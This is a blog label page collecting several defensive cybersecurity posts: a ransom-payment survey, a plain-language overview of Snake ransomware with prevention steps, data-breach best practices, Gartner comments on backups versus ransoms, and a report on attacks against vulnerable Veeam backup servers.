Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Data Backup. Show all posts

Cohesity Research Shows That Most Firms Break Their "Do Not Pay" Policies by Paying Millions in Ransoms

 

While a "do not pay" ransomware policy may sound appealing in theory, thwarting attackers' demand for ransom in exchange for stolen data is easier said than done. A recent study conducted by Cohesity, a leader in AI-powered data security management, reveals this truth.

The study surveyed over 900 IT and security decision makers who "take an if not when" approach regarding cyberattacks on their business. According to the study, 94% of participants stated that their organisation would pay a ransom to retrieve data and resume commercial operations, with 5% responding, "Maybe, depending on the ransom amount." 

The majority of those surveyed had paid a ransom in the previous two years, and the vast majority predicted that the threat of cyberattacks will increase dramatically by 2024. Worryingly, 79% of respondents reported that their firm has been the victim of a ransomware assault between June and December 2023. As a result, 96% of respondents believe the threat of cyberattacks to their industry would increase this year, with 71% expecting it to increase by more than 50%. 

9 out of 10 companies paid ransom 

Sixty-seven percent of respondents stated their organisation would be prepared to pay more than $3 million to retrieve data and restore business processes, while 35% were willing to pay $5 million as ransom. The study also demonstrated the need of being able to respond and recover, as 9 in 10 respondents indicated their organisation had paid a ransom in the previous two years, despite 84% claiming their company had a "do not pay" policy.

"Organisations can't control the increasing volume, frequency, or sophistication of cyberattacks such as ransomware," explained Brian Spanswick, Cohesity's chief information security officer and head of IT. "What they can control is their cyber resilience, which is the ability to respond quickly and recover. 

Expanding ransomware tactics

Since every ransomware incident is unique, the best people to determine whether or not to pay a ransom should be law enforcement or the cyber insurance provider for a company. Now, it appears that each ransomware attack is becoming more sophisticated and intense as the attack surface keeps expanding. 

Delinea, a privileged access management (PAM) company, stated in its annual State of Ransomware report that the growing quantity and frequency of ransomware assaults indicate a shift in attackers' strategy. 

According to Delinea, new tactics that use "stealth" to exfiltrate sensitive and private data have supplanted the tried and tested approaches of crippling a business and holding it hostage. For this motive, hackers usually make threats to either exploit the data to secure an attractive cyber insurance payout or sell it to the highest bidder on the darknet. 

Remember that external as well as internal sources can pose a threat to an organisation's cybersecurity. 90% of respondents stated insider threats are more or equally difficult to identify and avoid than external attacks, as the Securonix 2024 Insider Threat Report attests.

Defending Against Snake Ransomware: Here's All You Need to Know

 

A snake is not just a carnivorous reptile that poses a physical threat; it can also refer to a malicious software known as ransomware, capable of causing significant harm to your computer system. Similar to its namesake, this ransomware silently infiltrates your applications and contaminates your data.

If your data holds even a modicum of value, you could potentially fall victim to Snake ransomware. These cybercriminals are actively seeking their next target. So, how can you safeguard yourself from their clutches?

Snake ransomware is a hacking technique employed by cybercriminals to gain unauthorized remote access to your system and encrypt your data. Remarkably, your device continues to function normally during the infection, providing no indication of compromise. Subsequently, the intruder makes demands in exchange for data restoration. Snake ransomware primarily targets enterprises and employs a unique open-source programming language called Golang.

Snake ransomware is notorious for its stealthy operations. While all the technical components of your system may appear to be functioning as usual, malicious actors have surreptitiously tainted them with malware. To successfully execute their attack, threat actors employ the following steps:

1. Gaining Remote Access: Hackers use various methods to gain unauthorized access to systems. With Snake ransomware, they specifically exploit vulnerabilities in the remote desktop protocol (RDP) connection, a feature enabling multiple users to interact within a network. Despite RDP's default network-level authentication (NLA) intended to bolster security, attackers adeptly identify and exploit its weaknesses, often employing eavesdropping attacks to intercept and manipulate communication.

2. Registering a Signature: Once inside the system, the attacker assesses whether Snake ransomware has already infected it by using a mutually exclusive object (mutex) signature named EKANS (a reversed spelling of "snake"). Only one instance of Snake ransomware can exist on a system at a time. If the examination reveals an existing infection, the intruder aborts their mission; otherwise, they proceed.

3. Modifying Firewall Credentials: Firewalls play a critical role in monitoring incoming and outgoing network traffic to detect malicious vectors. To ensure the Snake ransomware remains undetected and unhindered, hackers manipulate firewall settings to align with their objectives. This involves configuring the firewall to block any traffic or communication that does not conform to the newly established settings, effectively isolating the system.

4. Deleting Backups: The success of a Snake ransomware attack hinges on the victim's inability to recover data from backups. Consequently, the threat actor meticulously searches for and deletes all data backups within the system. If a data recovery system is in place, the criminal alters its settings to render it inactive, often going unnoticed by the victim.

5. Disrupting Automated Processes: Snake ransomware disrupts both manual and automated processes to exert pressure on the victim and force compliance. This disruption can lead to a complete halt of operations, leaving the victim with no control over critical processes.

6. Encrypting Files: The final stage of a Snake ransomware attack involves encrypting files while they remain on the victim's system. Notably, files in the operating system are exempt from encryption, allowing the victim to log in and perform regular activities without realizing their system is under attack. Post-encryption, Snake ransomware renames these files.

Preventing Snake Ransomware
Preventing Snake ransomware is most effective when potential attackers are unable to operate with administrator privileges. Here are steps to shield your system:

1. Deactivate Remote Desktop Protocol: Disabling RDP significantly reduces the risk of an intruder accessing your system with Snake ransomware. If RDP is necessary, enforce robust security practices such as preventing third-party access, implementing smart card authentication, and adopting a defense-in-depth approach to secure all layers of your application.

2. Exercise Caution with Attachments and Links: Even with RDP deactivated, remain vigilant as perpetrators may send malware-infected attachments or links to gain remote access when opened. Consider installing antivirus software to detect and neutralize potential threats.

3.Monitor Network Activities: Snake ransomware operates covertly, making it essential to monitor network activities with automated threat monitoring tools. These tools work continuously to analyze network traffic and detect unusual behavior that might evade manual detection.

4. Back Up Data on Separate Devices: Storing data backups on the same system offers limited protection during a ransomware attack. Instead, implement and maintain backups in separate, unconnected locations. Consider offline storage for added security.

5. Beware of Unfamiliar Apps: Intruders frequently employ malicious software to execute cyberattacks. To safeguard your system, use threat detection systems to periodically scan your applications for unfamiliar tools. Effective detection tools not only identify such software but also contain their operations.

Snake ransomware operates stealthily and encrypts your data, rendering it inaccessible without the decryption key. To avoid reaching this critical point, prioritize proactive security measures, employ robust defenses, and cultivate a security-conscious culture to thwart Snake ransomware's attempts to infiltrate and compromise your system.

Safeguarding Your Data: 10 Best Practices to Prevent a Data Breach

 

Data breaches have become a significant concern for organizations and individuals alike, as cyber threats continue to evolve in complexity and scale. The consequences of a data breach can be severe, ranging from financial loss and reputational damage to legal implications. It is crucial for businesses to implement robust preventive measures to protect their valuable data and maintain customer trust. Here are some best practices and tactics to prevent a data breach.
  1. Develop a comprehensive security strategy: Establish a well-defined security plan that includes policies, procedures, and guidelines for data protection. Regularly review and update this strategy to adapt to evolving threats.
  2. Educate and train employees: Human error is a leading cause of data breaches. Conduct regular training sessions to educate employees on data security practices, such as strong password management, recognizing phishing attempts, and handling sensitive data appropriately.
  3. Implement strong access controls: Limit access to sensitive data and ensure that access rights are granted based on a need-to-know basis. Regularly review and update user permissions as employees change roles or leave the organization.
  4. Encrypt sensitive data: Utilize encryption techniques to protect data both at rest and in transit. Encryption adds an extra layer of security, making it difficult for unauthorized individuals to access and interpret the data.
  5. Regularly patch and update systems: Keep all software, operating systems, and applications up to date with the latest security patches. Vulnerabilities in outdated software can be exploited by attackers to gain unauthorized access.
  6. Use multi-factor authentication (MFA): Implement MFA for accessing critical systems and sensitive data. MFA adds an extra layer of authentication, making it harder for attackers to gain unauthorized access even if passwords are compromised.
  7. Conduct regular security assessments: Perform comprehensive security assessments, including vulnerability scans and penetration testing, to identify potential weaknesses and address them proactively.
  8. Implement data backup and recovery procedures: Regularly back up critical data and test the restoration process. In the event of a breach, having reliable backups can help restore systems and minimize downtime.
  9. Monitor network and system activity: Employ intrusion detection and prevention systems, as well as log monitoring and analysis tools, to identify and respond to suspicious activity promptly.
  10. Establish an incident response plan: Develop a well-defined incident response plan that outlines the steps to be taken in the event of a data breach. This plan should include communication strategies, containment measures, and coordination with relevant stakeholders.
By following these best practices, organizations can significantly reduce the risk of a data breach and protect sensitive information. However, it's essential to stay informed about emerging threats, industry best practices, and regulatory requirements to ensure ongoing data security. Remember, prevention is key when it comes to data breaches, and a proactive approach can save you from costly and damaging repercussions.


Backups can be Quicker and Less Expensive than Paying the Ransom

 

Ransomware operators want to spend as little time as possible within your systems, which means the encryption they use is shoddy and frequently corrupts your data. 

As a result, paying ransoms is typically a more expensive chore than simply refusing to pay and working from our own backups. That is the perspective of Richard Addiscott, a senior director analyst at Gartner. 

"They encrypt at an extremely fast rate," he said on Monday at the firm's IT Infrastructure, Operations, and Cloud Strategies Conference 2023 in Sydney. "They encrypt faster than you can run a directory listing."

Therefore, ransomware creators use poor encryption techniques and end up losing some of the data they later try to sell you. If ransomware operators deliver all the data they claim, Addiscott said, it is not simple to restore from corrupt data dumps delivered by criminals. Many people don't; instead, they start a new round of discussions regarding the cost of more releases by demanding a ransom. 

According to him, just 4% of ransomware victims actually manage to get all of their data back. Only 61 percent actually retrieve any data. Additionally, the average disruption to a victim's business is 25 days. 

Addiscott proposed that organisations design and practise ransomware recovery playbooks to shorten the period. Securing funding to prepare for a speedy post-ransomware recovery requires couching the risk in business terms rather than IT terms. 

According to Addiscott, the themes that are likely to release the purse strings are revenue protection, risk reduction, and cost control. Although he shook his head as he recalled instances when business leaders authorised enormous and speedy ransom payments that dwarfed the denied investments that may have rendered them unnecessary. 

He advised good preparation because ransomware crooks have figured out one technique to speed up stalled payment negotiations: whacking their victims with a DDoS attack, so they're battling two fires at once, and are thus willing to pay to make at least one problem go away. 

Ransomware operators also like to double-dip by demanding payment from the organisations whose data they have stolen, then mining the data to locate new targets. Addiscott mentioned an attack on a healthcare provider in which clients were confronted with a payment demand or their medical records will be revealed. 

Customers identified in a stolen data heist may be targeted with the suggestion that they notify suppliers that they want payments made in order to reduce the risk of their data being disclosed. Immutable backups and an isolated recovery environment, according to Addiscott, are a good combination of defences. 

However, he also stated that the people behind ransomware are brilliant, vicious, inventive, and relentless, so they will find new and even more nefarious ways to strike. 

The analyst did have one piece of good news: there would be a 21% decrease in ransomware attacks in 2022 compared to 2021. He hypothesised that the decline was caused by sanctions making it more difficult for Russian-based ransomware groups to operate.

Targeted: Hackers Exploit Vulnerable Veeam Backup Servers with FIN7 Tactics

Hackers Exploit Vulnerable Veeam Backup Servers with FIN7 Tactics

Cyberattacks on vulnerable Veeam backup servers exposed online

Veeam Backup and Replication software is a popular choice for many organizations to protect their critical data. However, recent reports have revealed that hackers are targeting vulnerable Veeam backup servers that are exposed online, leaving organizations at risk of data theft and other cyberattacks. 

There is evidence that at least one group of threat actors, who have been associated with several high-profile ransomware gangs, are targeting Veeam backup servers. 

Starting from March 28th, there have been reported incidents of malicious activity and tools similar to FIN7 attacks being used to exploit a high-severity vulnerability in the Veeam Backup and Replication (VBR) software. 

This vulnerability, tracked as CVE-2023-27532, exposes encrypted credentials stored in the VBR configuration to unauthenticated users, potentially allowing unauthorized access to the backup infrastructure hosts.

The software vendor addressed the vulnerability on March 7 and offered instructions for implementing workarounds. However, on March 23, a pentesting company named Horizon3 released an exploit for CVE-2023-27532, which showed how the credentials could be extracted in plain text using an unsecured API endpoint. 

The exploit also allowed attackers to run code remotely with the highest privileges. Despite the fix, Huntress Labs reported that roughly 7,500 internet-exposed VBR hosts were still susceptible to the vulnerability.

Evidence of FIN7 tactics used in recent attacks

A recent report by cybersecurity and privacy company WithSecure reveals that attacks in late March targeted servers running Veeam Backup and Replication software that was publicly accessible. The techniques used in these attacks were similar to those previously associated with FIN7. 

The researchers deduced that the attacker exploited the CVE-2023-27532 vulnerability, given the timing of the campaign, the presence of open TCP port 9401 on compromised servers, and the vulnerable version of VBR running on the affected hosts. 

During a threat hunt exercise using telemetry data from WithSecure's Endpoint Detection and Response (EDR), the researchers discovered Veeam servers generating suspicious alerts such as sqlservr.exe spawning cmd.exe and downloading PowerShell scripts.

The reason behind the vulnerability is that some organizations use insecure configurations when setting up their Veeam backup servers, making them accessible over the Internet. Hackers can then exploit these weaknesses to gain access to sensitive data and files.

One of the most common attack methods is through brute-force attacks. In this method, hackers use automated tools to try different username and password combinations until they gain access to the Veeam backup server. They can also use other methods like social engineering or spear-phishing to get hold of credentials or trick users into installing malware on their systems.

Once the hackers have gained access, they can steal the backup files, modify or delete them, or use them to launch further attacks on the organization's systems. The impact of such attacks can be severe, causing loss of critical data, disruption to business operations, and significant financial losses.

Mitigating the risk of cyberattacks on Veeam backup servers

To prevent such attacks, organizations need to ensure that their Veeam backup servers are properly secured. This includes configuring the server to only allow access from trusted networks, implementing strong password policies, and keeping the software up-to-date with the latest security patches.

Additionally, organizations should consider implementing multi-factor authentication (MFA) to provide an extra layer of security. MFA requires users to provide more than one form of identification, such as a password and a one-time code sent to their mobile device, making it more difficult for hackers to gain access even if they have obtained login credentials.

Regular security audits and vulnerability assessments can also help identify potential weaknesses and enable organizations to take proactive measures to mitigate them before hackers can exploit them.

Veeam backup servers are a critical component of an organization's data protection strategy, and securing them should be a top priority. Organizations must take necessary steps to ensure that their Veeam backup servers are properly secured and not exposed to the internet. 

By taking these necessary steps, organizations can significantly reduce the risk of a security breach and protect their critical data from falling into the wrong hands. It is always better to be proactive and take preventive measures rather than deal with the aftermath of a cyberattack.